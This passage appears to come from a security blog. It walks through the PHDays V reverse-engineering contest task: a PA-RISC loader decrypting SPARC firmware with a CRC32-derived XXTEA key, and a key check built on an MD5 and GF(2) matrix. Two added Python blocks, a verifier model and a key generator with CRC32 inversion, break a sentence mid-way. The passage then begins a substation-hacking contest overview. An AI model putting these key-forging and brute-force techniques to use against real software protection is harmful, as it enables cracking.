inherit;"><br /></span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span lang="EN-US">Let us define what common reverse engineering tasks look like. We are given an executable file for Windows (or Linux, MacOS or any other widely used operating system). We can run it, watch it in a debugger, and twist it in virtual environments in any way possible. The file format is known. The processor’s instruction set is x86, AMD64 or ARM. Library functions and system calls are documented. The hardware can be accessed through the operating system only. 
Using tools like IDAPro and HexRays makes the analysis of such applications very simple, while debug protection, virtual machines with their own instruction sets, and obfuscation could complicate the task. But large vendors hardly ever use any of those in their programs. So there’s no point in developing a contest aimed at demonstrating skills that are rarely addressed in practice.<o:p></o:p></span></span></div><div class="MsoNormal"><span lang="EN-US"><span style="font-family: inherit;"><br /></span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span lang="EN-US">However, there’s another area where reverse engineering has become more in demand: firmware analysis. The input file (the firmware) can come in any format and may be packed or encrypted. The operating system could be an obscure one, or there could be no operating system at all. Parts of the code may be impossible to change through firmware updates. The processor could be of any architecture. (For example, IDAPro “knows” no more than 100 different processors.) 
And of course, there is no documentation available, and neither debugging nor code execution is possible: you have the firmware, but not the device.<o:p></o:p></span></span></div><div class="MsoNormal"><span lang="EN-US"><span style="font-family: inherit;"><br /></span></span></div><span style="font-family: inherit;"><span lang="EN-US" style="line-height: 115%;">Our contest’s participants needed to analyze an executable </span><span style="line-height: 115%;"><a href="http://www.phdays.ru/download/fwldr.zip"><span lang="EN-US">file</span></a></span><span lang="EN-US" style="line-height: 115%;"> and find the correct key and the matching email (any internet user was able to take part in the contest).</span></span><br /><br /><br /><h3 style="text-align: left;"><span lang="EN-US"><span style="font-size: large;">Part One: Loader</span></span></h3><div class="MsoPlainText"><span style="color: windowtext;"><span style="font-family: inherit;">At the first stage, the input file is an ELF file compiled with a cross compiler for the PA-RISC architecture. IDA can work with this architecture, but not as well as with x86. Most references to stack variables are not recognized automatically, so you have to identify them manually. 
At least you can see all the library functions (log, printf, memcpy, strlen, fprintf, sscanf, memset, strspn) and even symbolic names for some functions (c32, exk, cry, pad, dec, cen, dde). The program expects two input arguments: an email and a key.</span></span></div><div class="MsoPlainText"><span style="color: windowtext; font-family: Calibri, sans-serif;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-T_W6ASVm1eo/VZJKCJPTxoI/AAAAAAAAFHc/NdgnNgkRLjU/s1600/new29-062.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="39" src="http://4.bp.blogspot.com/-T_W6ASVm1eo/VZJKCJPTxoI/AAAAAAAAFHc/NdgnNgkRLjU/s640/new29-062.png" width="640" /></a></div><div class="MsoPlainText"><span style="color: windowtext; font-family: Calibri, sans-serif;"><br /></span></div><div class="MsoPlainText"><span lang="EN-US" style="color: windowtext; font-family: Calibri, sans-serif;"><br /></span></div><div class="MsoPlainText"><span style="font-family: inherit;">It’s not hard to figure out that the key should consist of two parts separated by the “-” character. 
The first part should consist of seven MIME64 characters (0-9A-Za-z+/), the second part of 32 hex characters that translate to 16 bytes.</span></div><div class="MsoPlainText"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-Ku27xjpwP1o/VZJKCKTfnhI/AAAAAAAAFHk/72TY7TgC2Nk/s1600/new29-063.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="50" src="http://1.bp.blogspot.com/-Ku27xjpwP1o/VZJKCKTfnhI/AAAAAAAAFHk/72TY7TgC2Nk/s640/new29-063.png" width="640" /></a></div><div class="MsoPlainText"><br /></div><div class="MsoNormal"><span lang="EN-US"><br /></span></div><div class="MsoNormal"><span lang="EN-US"></span></div><div class="MsoNormal"><span lang="EN-US"><span style="font-family: inherit;">Next, we see the calls to the c32 function:<o:p></o:p></span></span></div><div class="MsoNormal"><span lang="EN-US"><br /></span></div><div class="MsoNormal"><span lang="EN-US" style="font-family: "Courier New"; mso-ansi-language: EN-US;">t = c32(-1, argv[1], strlen(argv[1])+1)<o:p></o:p></span></div><div class="MsoNormal"><span lang="EN-US"> </span></div><div class="MsoNormal"><span lang="EN-US" style="font-family: "Courier New"; mso-ansi-language: EN-US;">k = ~c32(t, argv[2], strlen(argv[2])+1)<o:p></o:p></span></div><div class="MsoNormal"><span lang="EN-US" style="font-family: "Courier New"; mso-ansi-language: EN-US;"><br /></span></div><div class="MsoPlainText"><span lang="EN-US" style="color: windowtext; font-size: 11pt;"><span style="font-family: inherit;">The name of the function is a hint: it’s a CRC32 function, which is confirmed by the constant 0xEDB88320.<o:p></o:p></span></span></div><div class="MsoPlainText"><span lang="EN-US" style="color: windowtext; font-size: 11pt;"><span style="font-family: inherit;">Next, the dde function (short for doDecrypt) is called; it receives the inverted output of the CRC32 function (the encryption key) 
as the first argument, and the address and the size of the encrypted array as the second and third ones.<o:p></o:p></span></span></div><div class="MsoPlainText"><br /></div><div class="MsoPlainText"><span lang="EN-US" style="color: windowtext; font-size: 11pt;"><span style="font-family: inherit;">Decryption is performed by BTEA (Block Tiny Encryption Algorithm), based on code taken from Wikipedia. We can guess that it’s BTEA from the use of the constant DELTA == 0x9E3779B9. The constant is also used in the algorithms BTEA is based on, but there are not many of them.<o:p></o:p></span></span></div><div class="MsoPlainText"><br /></div><div class="MsoPlainText"><span lang="EN-US" style="color: windowtext; font-size: 11pt;"><span style="font-family: inherit;">The key should be 128 bits wide, but we receive only 32 bits from CRC32. So we get three more DWORDs from the exk function (expand_key), each obtained by multiplying the previous value by the same DELTA.<o:p></o:p></span></span></div><div class="MsoPlainText"><br /></div><div class="MsoPlainText"><span lang="EN-US" style="color: windowtext; font-size: 11pt;"><span style="font-family: inherit;">However, the use of BTEA is uncommon. First, the algorithm supports a variable block size, and we use a 12-byte block (there are processors with 24-bit registers and memory, so why use only powers of two?). Second, we swapped the encryption and decryption functions.<o:p></o:p></span></span></div><div class="MsoPlainText"><br /></div><div class="MsoPlainText"><span lang="EN-US" style="color: windowtext; font-size: 11pt;"><span style="font-family: inherit;">Since a data stream is encrypted, cipher block chaining (CBC) is applied. The entropy of the decrypted data is calculated in the cen function (calc_entropy). 
If its value exceeds 7 (bits per byte), the decryption result is considered incorrect and the program exits.</span></span></div><div class="MsoPlainText"><br /></div><div class="MsoPlainText"><span lang="EN-US" style="color: windowtext; font-size: 11pt;"><span style="font-family: inherit;">The encryption key is only 32 bits wide, so it looks easy to brute-force. However, to test every key we would have to decrypt 80 kilobytes of data and then calculate the entropy, so brute-forcing the key this way would take a long time.</span></span></div><div class="MsoPlainText"><br /></div><div class="MsoNormal"><span lang="EN-US"><span style="font-family: inherit;">But after the entropy calculation the pad function (strip_pad) is called, which checks and removes PKCS#7 padding. Thanks to the way CBC works, it is enough to decrypt only one block (the last one), take its last byte N, check that N is between 1 and 12 (inclusive) and that each of the last N bytes equals N. This sharply reduces the number of operations needed to test one key. But if the last decrypted byte equals 1 (which happens for about 1 in 256 keys), the padding check passes trivially and the full check still has to be performed.</span></span></div><div class="MsoNormal"><span lang="EN-US"><span style="font-family: inherit;"><br /></span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span lang="EN">A faster method is to assume that the decoded data have a DWORD-aligned length (a multiple of 4 bytes). 
Then the last DWORD of the last block can hold only one of three values: 0x04040404, 0x08080808 or 0x0C0C0C0C. Combining this heuristic with brute force, one can run through all possible keys and find the right one in less than 20 minutes.</span></span></div><div class="MsoNormal"><span lang="EN"><span style="font-family: inherit;"><br /></span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span lang="EN">If all the checks after decryption (the entropy and the integrity of the padding) pass, the fire_second_proc function is called, which simulates starting a second CPU and loading the decrypted firmware into it (modern devices usually have more than one processor, often with different architectures).</span></span></div><div class="MsoNormal"><span lang="EN"><span style="font-family: inherit;"><br /></span></span></div><div class="MsoNormal"><span lang="EN-US"><span style="font-family: inherit;"> </span></span></div><div 
class="MsoNormal"><span style="font-family: inherit;"><span lang="EN">If the second processor starts, it receives the user's email and the 16 bytes of the second part of the key via the send_auth_data function. At this point we made a mistake: the size of the email string was passed instead of the size of the second part of the key.</span></span></div><div class="MsoNormal"><span lang="EN"><span style="font-family: inherit;"><br /></span></span></div><div class="MsoNormal"><span lang="EN"><br /></span></div><h3 style="text-align: left;"><b><span style="font-size: large;">Part Two: Firmware</span></b></h3><div class="MsoNormal"><span style="font-family: inherit;"><span lang="EN">The analysis of the second part is a little more complicated. There was no ELF file, only a memory image, without headers, function names or other metadata. 
The processor type and the load address were unknown as well.</span></span></div><div class="MsoNormal"><span lang="EN"><span style="font-family: inherit;"><br /></span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span lang="EN">To determine the processor architecture we resorted to brute force: open the image in IDA, select the next processor type, and repeat until IDA shows something that looks like code. This brute force leads to the conclusion that it is big-endian SPARC.</span></span></div><div class="MsoNormal"><span lang="EN"><span style="font-family: inherit;"><br /></span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span lang="EN">Now we need to determine the load address. The function at offset 0x22E0 is never called, but it contains a lot of code. 
We can assume that it is the entry point of the program, the start function.</span></span></div><div class="MsoNormal"><span lang="EN"><span style="font-family: inherit;"><br /></span></span></div><div class="MsoNormal"><span lang="EN"><span style="font-family: inherit;"> </span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span lang="EN">In the third instruction of the start function, an unknown library function is called with a single argument equal to 0x126F0, and the same function is called from start four more times, always with arguments of similar values (0x12718, 0x12738, 0x12758, 0x12760). And in the middle of the image, starting at offset 0x2490, there are five text strings:</span></span></div><div class="MsoNormal"><span lang="EN"><br /></span></div><div class="MsoNormal"><span lang="EN-US">00002490 .ascii "Firmware loaded, sending ok back."&lt;0&gt;</span></div><div class="MsoNormal"><span lang="EN-US">000024B8 .ascii "Failed to retrieve email."&lt;0&gt;</span></div><div class="MsoNormal"><span lang="EN-US">000024D8 .ascii "Failed to retrieve codes."&lt;0&gt;</span></div><div class="MsoNormal"><span lang="EN-US">000024F8 
.ascii "Gratz!"&lt;0&gt;</span></div><div class="MsoNormal"><span lang="EN-US">00002500 .ascii "Sorry may be next time..."&lt;0&gt;</span></div><div class="MsoNormal"><span lang="EN-US"><br /></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span lang="EN">If we assume that the load address equals 0x126F0 - 0x2490 == 0x10260, then the arguments of all those calls point exactly at these strings, and the unknown library function turns out to be printf (or puts).</span></span></div><div class="MsoNormal"><span lang="EN"><span style="font-family: inherit;"><br /></span></span></div><div class="MsoNormal"><span lang="EN"><span style="font-family: inherit;"> </span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span lang="EN">After changing the load base, the code looks something like this:</span></span></div><div class="MsoNormal"><span lang="EN"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-KDaOh5Ma1UU/VZJKCptoydI/AAAAAAAAFHw/h1vJkeI07yY/s1600/new29-064.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="382" src="http://1.bp.blogspot.com/-KDaOh5Ma1UU/VZJKCptoydI/AAAAAAAAFHw/h1vJkeI07yY/s640/new29-064.png" width="640" /></a></div><div class="MsoNormal"><span lang="EN"><br 
/></span></div><div class="MsoNormal"><span lang="EN"><br /></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span lang="EN">The value 0x0BA0BAB0 passed to the function sub_12194 can be found in the first part of the task, in the fire_second_proc function, where it is compared with what is read by read_pipe_u32(). So sub_12194 should be named write_pipe_u32.</span></span></div><div class="MsoNormal"><span lang="EN"><span style="font-family: inherit;"><br /></span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span lang="EN">Similarly, the two calls to the library function sub_24064 are memset(someVar, 0, 0x101) for the email and the code buffers, while sub_121BC is read_pipe_str(), the counterpart of write_pipe_str() from the first part.</span></span></div><div class="MsoNormal"><span lang="EN"><span style="font-family: inherit;"><br /></span></span></div><div class="MsoNormal"><span lang="EN"><span style="font-family: inherit;"> </span></span></div><div class="MsoNormal"><span class="hps"><span lang="EN"><span style="font-family: inherit;">The 
first</span></span></span><span lang="EN"><span style="font-family: inherit;"> function (at offset 0, i.e. address 0x10260) contains the typical constants of MD5_Init (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476):</span></span></div><div class="MsoNormal"><span lang="EN"><span style="font-family: inherit;"><br /></span></span></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-IiVLskRmxDI/VZJKCzgy-jI/AAAAAAAAFIE/q9ksxn_8agA/s1600/new29-065.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="640" src="http://2.bp.blogspot.com/-IiVLskRmxDI/VZJKCzgy-jI/AAAAAAAAFIE/q9ksxn_8agA/s640/new29-065.png" width="603" /></a></div><div class="MsoNormal"><span lang="EN"><br /></span></div><div class="MsoNormal"><span lang="EN"><br /></span></div><div class="MsoNormal"><span lang="EN"><span style="font-family: inherit;">Next to the call to MD5_Init, it is easy to spot MD5_Update() and MD5_Final(), preceded by a call to the library strlen().</span></span></div><div class="MsoNormal"><span lang="EN"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a 
href="http://3.bp.blogspot.com/-OzZ-jPt3iHk/VZJKDFBjIQI/AAAAAAAAFH0/VGgPLhMIXdE/s1600/new29-066.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="448" src="http://3.bp.blogspot.com/-OzZ-jPt3iHk/VZJKDFBjIQI/AAAAAAAAFH0/VGgPLhMIXdE/s640/new29-066.png" width="640" /></a></div><div class="MsoNormal"><span lang="EN"><br /></span></div><div class="MsoNormal"><span lang="EN"><br /></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span lang="EN">Not many unknown functions are left in start().</span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span lang="EN"><br /></span></span></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-71h-XCcazKE/VZJKDuuLlkI/AAAAAAAAFH8/oBfQPCSp2CM/s1600/new29-067.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="616" src="http://1.bp.blogspot.com/-71h-XCcazKE/VZJKDuuLlkI/AAAAAAAAFH8/oBfQPCSp2CM/s640/new29-067.png" width="640" /></a></div><div class="MsoNormal"><span lang="EN"><br /></span></div><div class="MsoNormal"><span lang="EN"><br /></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span lang="EN">The sub_12480 function reverses a byte array of the specified length. 
In fact, it is memrev, and it is applied to the 16-byte code array.</span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span lang="EN"><br /></span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span lang="EN">Obviously, the sub_24040 function checks whether the code is correct. Its arguments are the calculated MD5(email), the array filled in by the sub_12394 function, and the number 16. It must be a call to memcmp!</span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span lang="EN"><br /></span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span lang="EN">The real trick happens in sub_12394. There are almost no hints there, but the algorithm can be described in one phrase: multiplication of a binary matrix of size <span class="hps">
128 by 128 by a binary vector of 128 bits. The matrix is stored in the firmware at 0x240B8.</span></span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span lang="EN"><br /></span></span></div><div class="MsoNormal"><span lang="EN"><span style="font-family: inherit;"> </span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span lang="EN">Thus, the code is correct if MD5(email) == matrix_mul_vector(matrix, code).</span></span></div><div class="MsoNormal"><span lang="EN"><br /></span></div><div class="MsoNormal"><span lang="EN"><br /></span></div><h3 style="text-align: left;"><span style="font-size: large;">Calculating the Key</span></h3><div class="MsoNormal"><span style="font-family: inherit;"><span lang="EN">To find the correct value of the code, you need to solve the system of linear equations over GF(2) described by the matrix, whose right-hand side is the corresponding bits of MD5(email). If you have forgotten your linear algebra: this is easily solved by Gaussian elimination (with XOR in place of subtraction).</span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span 
class="hps"><span lang="EN-US"><br /></span></span></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: inherit;"><span lang="EN">Once the right-hand part of the key is known (32 hexadecimal characters), we can look for the first seven characters such that the CRC32 calculation yields the value found for the BTEA key. There are about 1024 such values (seven MIME64 characters carry 42 bits, of which the CRC fixes 32), and they can be quickly obtained by brute force, or by inverting CRC32 and checking that the resulting characters are valid.</span></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><br /></div><div class="MsoNormal"><span style="font-family: inherit;"><span lang="EN">Now everything needs to be put together to obtain a key that passes all the checks and is recognised as valid by our verifier :)</span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span lang="EN">We were afraid that no one would be able to solve the task from beginning to end. Fortunately, Victor Alyushin showed that our fears were groundless. 
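The first-part verifier as an added Python model (neither the task's own code nor the winner's solution): the CRC32-derived key expanded by repeated multiplication with DELTA, 12-byte XXTEA blocks with the coding and decoding halves swapped, CBC, PKCS#7 padding and the entropy gate, followed by the last-block-only key search described above. Everything the write-up does not state is an assumption and is marked as such in the comments: argv[1] is the email and argv[2] the key string, c32 is the plain table loop without a final XOR (which is why the program inverts its result itself), words are little-endian, and the IV is all zeros. The firmware image, email and key are constructed, and the search runs over a small window of candidates around the true key rather than the full 32-bit space.

```python
"""Model of the first-part verifier from the PHDays V Best Reverser task: CRC32-derived XXTEA
key, 12-byte blocks, btea halves swapped, CBC, PKCS#7, an entropy gate, last-block key search."""
import math
import zlib

DELTA = 0x9E3779B9   # the constant that gives BTEA/XXTEA (and TEA/XTEA) away
MASK = 0xFFFFFFFF
BLOCK = 12           # 3 x 32-bit words per block, as in the task
PAD_DWORDS = {b"\x04" * 4, b"\x08" * 4, b"\x0c" * 4}   # PKCS#7 tails of DWORD-aligned data

def derive_k0(email: bytes, key: bytes) -> int:
    # t = c32(-1, email, len+1); k = ~c32(t, key, len+1).  Assuming c32 is the table loop with
    # no final XOR, the chained calls (NUL terminators included) equal one standard CRC32.
    return zlib.crc32(email + b"\0" + key + b"\0")

def expand_key(k0: int) -> list:
    """exk(): three more DWORDs, each the previous one multiplied by DELTA."""
    k = [k0 & MASK]
    for _ in range(3):
        k.append((k[-1] * DELTA) & MASK)
    return k

def _mx(s, y, z, p, e, k):
    return ((((z >> 5) ^ (y << 2)) + ((y >> 3) ^ (z << 4))) ^ ((s ^ y) + (k[(p & 3) ^ e] ^ z))) & MASK

def btea_encode(v: list, k: list) -> list:   # Wikipedia btea(), coding direction (n > 1)
    v, n = list(v), len(v)
    s, z = 0, v[-1]
    for _ in range(6 + 52 // n):
        s = (s + DELTA) & MASK
        e = (s >> 2) & 3
        for p in range(n - 1):
            v[p] = (v[p] + _mx(s, v[p + 1], z, p, e, k)) & MASK
            z = v[p]
        v[-1] = (v[-1] + _mx(s, v[0], z, n - 1, e, k)) & MASK
        z = v[-1]
    return v

def btea_decode(v: list, k: list) -> list:   # Wikipedia btea(), decoding direction (n < -1)
    v, n = list(v), len(v)
    rounds = 6 + 52 // n
    s, y = (rounds * DELTA) & MASK, v[0]
    for _ in range(rounds):
        e = (s >> 2) & 3
        for p in range(n - 1, 0, -1):
            v[p] = (v[p] - _mx(s, y, v[p - 1], p, e, k)) & MASK
            y = v[p]
        v[0] = (v[0] - _mx(s, y, v[-1], 0, e, k)) & MASK
        y = v[0]
        s = (s - DELTA) & MASK
    return v

# Assumed: little-endian words (the first part is an x86 binary) and a caller-supplied IV.
def _words(b): return [int.from_bytes(b[i:i + 4], "little") for i in range(0, len(b), 4)]
def _bytes(w): return b"".join(x.to_bytes(4, "little") for x in w)
def _xor(a, b): return bytes(x ^ y for x, y in zip(a, b))

def encrypt_firmware(plain: bytes, k0: int, iv: bytes) -> bytes:
    """How the data was produced: btea's *decoding* half is the forward step, CBC over PKCS#7 blocks."""
    k, n = expand_key(k0), BLOCK - len(plain) % BLOCK
    plain += bytes([n]) * n
    out, prev = [], iv
    for i in range(0, len(plain), BLOCK):
        prev = _bytes(btea_decode(_words(_xor(plain[i:i + BLOCK], prev)), k))
        out.append(prev)
    return b"".join(out)

def decrypt_block(ct: bytes, index: int, k0: int, iv: bytes) -> bytes:
    # CBC: P_i = E(C_i) xor C_(i-1), so any single block can be recovered on its own.
    prev = iv if index == 0 else ct[(index - 1) * BLOCK:index * BLOCK]
    cur = ct[index * BLOCK:(index + 1) * BLOCK]
    return _xor(_bytes(btea_encode(_words(cur), expand_key(k0))), prev)

def entropy(data: bytes) -> float:   # cen()/calc_entropy: Shannon entropy in bits per byte
    return -sum(data.count(b) / len(data) * math.log2(data.count(b) / len(data)) for b in set(data))

def strip_pad(data: bytes):   # strip_pad(): PKCS#7 with a 12-byte block; None if the padding is wrong
    n = data[-1] if data else 0
    return data[:-n] if 1 <= n <= BLOCK and data[-n:] == bytes([n]) * n else None

def full_check(ct: bytes, k0: int, iv: bytes):
    """The slow path: decrypt everything, reject if entropy > 7, then strip the padding."""
    plain = b"".join(decrypt_block(ct, i, k0, iv) for i in range(len(ct) // BLOCK))
    return None if entropy(plain) > 7 else strip_pad(plain)

def recover_key(ct: bytes, iv: bytes, candidates):
    """Last block only per candidate; nearly every wrong key fails the DWORD test after 12 bytes."""
    last = len(ct) // BLOCK - 1
    for k0 in candidates:
        if decrypt_block(ct, last, k0, iv)[-4:] in PAD_DWORDS:
            plain = full_check(ct, k0, iv)
            if plain is not None:
                return k0, plain
    return None

# Constructed sample (not the task's data): low-entropy "firmware", email, task-format key, zero IV.
SAMPLE_EMAIL, SAMPLE_KEY = b"reverser@example.com", b"AbCdEf0" + b"00112233445566778899aabbccddeeff"
SAMPLE_PLAIN = (b"Firmware loaded, sending ok back.\0" * 8).ljust(300, b"\0")   # 300 = 4 * 75
SAMPLE_K0 = derive_k0(SAMPLE_EMAIL, SAMPLE_KEY)
SAMPLE_CT = encrypt_firmware(SAMPLE_PLAIN, SAMPLE_K0, bytes(BLOCK))
```

The fast path costs one XXTEA block per candidate and compares four bytes; only candidates that produce 0x04040404, 0x08080808 or 0x0C0C0C0C pay for the full decryption and the entropy calculation. A plaintext whose length is not a multiple of 4 would slip past the DWORD filter, which is exactly why the general 1..12 padding check is kept in strip_pad.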
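Putting both parts together, as an added example rather than the authors' or the winner's solver: Gaussian elimination over GF(2) for the 16-byte code, then an inversion of CRC32 that forges the seven MIME64 characters in front of it. The 128x128 matrix is a constructed random invertible stand-in for the one at 0x240B8, and the bit layout is assumed (the memrev'ed 16 bytes and the MD5 digest both read as big-endian integers), as is the key layout (the prefix immediately followed by the 32 hex characters). Enumerating the 64^3 three-character heads and letting the CRC dictate the remaining four bytes also reproduces the figure given above, about 1024 valid prefixes: only a quarter of all byte values are MIME64 characters, and four bytes are forced.

```python
"""Building the whole key for the PHDays V Best Reverser task: Gaussian elimination over GF(2)
for the 16-byte code, then a CRC32 inversion that forges the seven MIME64 prefix characters."""
import hashlib
import itertools
import random

N = 128
B64 = b"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/"
TABLE = []
for i in range(256):   # the usual reflected CRC32 table for the polynomial 0xEDB88320
    c = i
    for _ in range(8):
        c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
    TABLE.append(c)
TOP = {t >> 24: i for i, t in enumerate(TABLE)}   # high byte -> index (unique): what makes CRC32 invertible

# ---- second part: MD5(email) == matrix * code over GF(2) ----
def matrix_mul_vector(rows: list, vec: int) -> int:
    """rows[i] bit j is M[i][j]; result bit i is the parity of M[i] & vec."""
    return sum((bin(r & vec).count("1") & 1) << i for i, r in enumerate(rows))

def gf2_solve(rows: list, rhs: int):
    """Gaussian elimination over GF(2) for M * x = rhs; None when M is singular."""
    aug = [(r << 1) | ((rhs >> i) & 1) for i, r in enumerate(rows)]   # bit 0 carries the rhs
    for col in range(N):
        bit = 1 << (col + 1)
        piv = next((i for i in range(col, N) if aug[i] & bit), None)
        if piv is None:
            return None
        aug[col], aug[piv] = aug[piv], aug[col]
        for i in range(N):
            if i != col and aug[i] & bit:
                aug[i] ^= aug[col]          # XOR is subtraction in GF(2)
    return sum((aug[i] & 1) << i for i in range(N))

def md5_int(email: bytes) -> int:   # assumed bit layout: the digest read as a big-endian integer
    return int.from_bytes(hashlib.md5(email).digest(), "big")

def code_is_valid(rows: list, email: bytes, code_hex: str) -> bool:
    """The firmware's check: memcmp(MD5(email), matrix_mul_vector(matrix, memrev(code)), 16)."""
    vec = int.from_bytes(bytes.fromhex(code_hex)[::-1], "big")   # memrev() first, same layout assumed
    return matrix_mul_vector(rows, vec) == md5_int(email)

def solve_code(rows: list, email: bytes) -> str:
    """The 32 hex characters that pass code_is_valid for this email (matrix must be invertible)."""
    return gf2_solve(rows, md5_int(email)).to_bytes(16, "big")[::-1].hex()

def random_invertible_matrix(seed: int) -> list:   # constructed stand-in for the matrix at 0x240B8
    rng = random.Random(seed)
    while True:
        rows = [rng.getrandbits(N) for _ in range(N)]
        if gf2_solve(rows, 0) is not None:   # solvable for every rhs iff non-singular
            return rows

# ---- first part: the seven MIME64 characters in front of the hex code ----
def crc_raw(state: int, data: bytes) -> int:   # c32(): the table loop without the final inversion
    for b in data:
        state = TABLE[(state ^ b) & 0xFF] ^ (state >> 8)
    return state

def crc_raw_reverse(state: int, data: bytes) -> int:
    """Undo crc_raw over data: each step is inverted by matching the high byte through TOP."""
    for b in reversed(data):
        i = TOP[state >> 24]
        state = (((state ^ TABLE[i]) << 8) & 0xFFFFFFFF) | ((i ^ b) & 0xFF)
    return state

def forge4(state: int, target: int) -> bytes:   # the unique 4 bytes taking crc_raw from state to target
    idx = []
    for _ in range(4):         # walk back from the target; the low bytes shifted out do not matter
        idx.append(TOP[target >> 24])
        target = ((target ^ TABLE[idx[-1]]) << 8) & 0xFFFFFFFF
    out = bytearray()
    for i in reversed(idx):    # walk forward from state, choosing each byte to hit that table index
        out.append((state ^ i) & 0xFF)
        state = TABLE[i] ^ (state >> 8)
    return bytes(out)

def k0_of(email: bytes, key: bytes) -> int:   # t = c32(-1, email, len+1); k = ~c32(t, key, len+1)
    return crc_raw(crc_raw(0xFFFFFFFF, email + b"\0"), key + b"\0") ^ 0xFFFFFFFF

def find_prefixes(email: bytes, code: bytes, k0: int):
    """Yield every 7-character MIME64 prefix p with k0_of(email, p + code) == k0 (assumed layout:
    prefix directly followed by the 32 hex characters).  64^3 heads are enumerated; the CRC forces
    the remaining four bytes, which are kept only if they are MIME64 characters themselves."""
    start = crc_raw(0xFFFFFFFF, email + b"\0")
    want = crc_raw_reverse(k0 ^ 0xFFFFFFFF, code + b"\0")   # CRC state required right after the prefix
    for t in itertools.product(B64, repeat=3):
        head = bytes(t)
        tail = forge4(crc_raw(start, head), want)
        if not tail.translate(None, B64):   # empty after deleting MIME64 bytes: all four are valid
            yield head + tail

# Constructed sample, not the task's data.
SAMPLE_EMAIL, SAMPLE_PREFIX = b"reverser@example.com", b"AbCdEf0"
SAMPLE_MATRIX = random_invertible_matrix(2015)
SAMPLE_CODE = solve_code(SAMPLE_MATRIX, SAMPLE_EMAIL)
SAMPLE_K0 = k0_of(SAMPLE_EMAIL, SAMPLE_PREFIX + SAMPLE_CODE.encode())
```

The CRC inversion works because the high byte of every CRC32 table entry is distinct, so a single update step can be undone from the new state's top byte alone; four unknown bytes are enough to steer the 32-bit state anywhere, and the three characters in front of them are the free bits that give roughly 1024 solutions.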
You can find his write-up on the task at </span><a href="http://nightsite.info/blog/16542-phdays-2015-best-reverser.html">http://nightsite.info/blog/16542-phdays-2015-best-reverser.html</a>. This is the second time Victor Alyushin has won the contest (he was the winner in <a href="http://blog.ptsecurity.com/2013/06/best-reverser-at-phdays-iii-developers.html">2013</a> as well).</span></div><div class="MsoNormal"><span style="font-family: inherit;"><span lang="EN-US"><br /></span></span></div><div class="MsoNormal"><span lang="EN-US"><span style="font-family: inherit;">A participant who wished to remain anonymous solved part of the task and took second place.</span></span></div><div class="MsoNormal"><span lang="EN-US"><span style="font-family: inherit;"><br /></span></span></div><div class="MsoNormal"><span lang="EN-US"><span style="font-family: inherit;">Thanks to all participants!</span></span></div><div class="MsoNormal"><br /></div></div>Digital Substation Takeover: Contest Overview (published 2015-06-11)<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-ct0Hn2JXurs/VXl-gXF6vjI/AAAAAAAAFDQ/rQZZUaXxdQ4/s1600/Digital-Substation-Takeover-%25D0%25BD%25D0%25B0-PHDays-1024x587.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="366" 
src="http://4.bp.blogspot.com/-ct0Hn2JXurs/VXl-gXF6vjI/AAAAAAAAFDQ/rQZZUaXxdQ4/s640/Digital-Substation-Takeover-%25D0%25BD%25D0%25B0-PHDays-1024x587.jpg" width="640" /></a></div><br />Digital Substation Takeover, presented by <a href="http://igrids.ru/">iGRIDS</a>, was held at PHDays V. The contest's participants tried their hand at hacking a real electrical substation designed according to IEC 61850. The general task was to carry out a successful attack against the control system of the electrical equipment.<br /><a name='more'></a><br /><b><span style="font-size: large;">What it's all about</span></b><br /><br />A special model of a high-voltage (500 kV) substation had been developed for the contest. It included switchgear, time servers, and the protective relays that modern high-voltage networks use to provide protection in emergencies (a short circuit, a fault on a power transmission line, and so on).<br /><br />Several scenarios were offered, each corresponding to unauthorized access to the switchgear: opening a circuit breaker, or closing an earthing switch despite the interlocking. The contest's organizers promised that the most difficult task, causing an emergency on the site, would be followed by fireworks of burning wires on the model overhead power line set up nearby.<br /><br /><iframe allowfullscreen="" frameborder="0" height="270" 